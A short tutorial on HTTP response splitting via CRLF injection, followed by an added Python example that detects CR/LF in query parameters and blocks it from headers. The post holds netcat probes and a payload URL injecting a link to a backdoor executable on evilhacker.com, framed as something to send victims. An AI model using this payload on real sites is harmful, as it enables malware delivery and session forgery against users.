Basically, this vulnerability is found in the "set-cookie" and "location" response headers. If we connect to a website:
nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this GET request we get a response like the following (try to find it):
If this is the host's behavior, then we should try to insert a carriage return and line feed:
nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1
If the host is vulnerable, then it will reply with an additional line "it-is=vulnerable", like this:
set-cookie=PaymentMethod=credi
it-is=vulnerable
Simply put, a hacker can force users to download a backdoor:
http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find other ways ;)
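As an added example that is not part of the original post, the Python below shows the server-side check that closes the hole described above: it decodes the query string of a request line modelled on the probe, flags any parameter carrying CR/LF, and refuses to build the Set-Cookie header from such a value. The request lines, the parameter names and the PaymentMethod cookie are constructed from the post, not taken from any real host.

```python
"""Added example (not from the original post): spot CR/LF smuggled into query
parameters and never reflect such a value into a Set-Cookie/Location header."""
from urllib.parse import urlsplit, parse_qsl

# Constructed request lines modelled on the post's probe (no real target).
PROBE = "GET /something.php?id=1&pay=40000&method=credit%0d%0ait-is=vulnerable HTTP/1.1"
CLEAN = "GET /something.php?id=1&pay=40000&method=credit HTTP/1.1"

CRLF_CHARS = ("\r", "\n")


def query_params(request_line):
    """Return the decoded (name, value) pairs of the request line's query string."""
    _method, target, _version = request_line.split(" ", 2)
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def find_crlf_params(request_line):
    """Detection: names of parameters whose decoded value contains CR or LF,
    which is exactly what the post's method=credit%0d%0a... probe carries."""
    return [name for name, value in query_params(request_line)
            if any(c in value for c in CRLF_CHARS)]


def safe_header_value(value):
    """Mitigation: a value bound for Set-Cookie or Location must not contain
    CR/LF. Raise instead of emitting a header that would split the response."""
    if any(c in value for c in CRLF_CHARS):
        raise ValueError("CR/LF in header value")
    return value


def build_set_cookie(request_line):
    """Server side of the post's scenario: reflect `method` into the cookie,
    but only after validation. Returns the header line, or None if rejected."""
    params = dict(query_params(request_line))
    try:
        return "Set-Cookie: PaymentMethod=" + safe_header_value(params.get("method", ""))
    except ValueError:
        return None


if __name__ == "__main__":
    print(find_crlf_params(PROBE))   # ['method']
    print(build_set_cookie(CLEAN))   # Set-Cookie: PaymentMethod=credit
    print(build_set_cookie(PROBE))   # None
```

The same `safe_header_value` check belongs in front of every header the application builds from user input, not just the cookie shown here.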
Be aware!!!